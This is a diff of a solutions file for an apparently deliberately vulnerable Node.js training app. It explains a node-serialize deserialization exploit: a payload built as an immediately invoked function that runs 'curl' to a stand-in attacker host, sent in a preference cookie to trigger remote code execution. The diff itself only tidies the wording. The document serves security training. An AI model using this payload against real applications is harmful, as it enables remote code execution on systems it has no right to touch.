payatu/vuln-nodejs-app/solutions/solutions.md

 {"payload":"_$$ND_FUNC$$_function(){require('child_process').exec('curl yourwebsite.com', function(error, stdout, stderr){console.log(stdout)})}"}
 ```

-Now we have a serialized payload that can be deserialized using unserialize() function but the code will not execute until we trigger the function corresponding to the `payload` property to do that we can
-use Immediately invoked function expression for calling the function by adding `()` after the
-function so our final payload will look like this:
+Now we have a serialized payload that can be deserialized using unserialize() function but the code will not execute until we trigger the function corresponding to the `payload` property to do that we can use the immediately invoked function expression for calling the function by adding `()` after the function, our final payload will look like this:

 ```json
 {"payload":"_$$ND_FUNC$$_function(){require('child_process').exec('curl yourwebsite.com', function(error, stdout, stderr){console.log(stdout)})}()"}

 ```

-Now replace this payload value with preference cookie value in `/save-preference` POST request and you
-will receive a callbak request on your attacker server.
+Now replace this payload value with the preference cookie value in `/save-preference` POST request and you will receive a callback request on your attacker server.

 **Reference:** https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/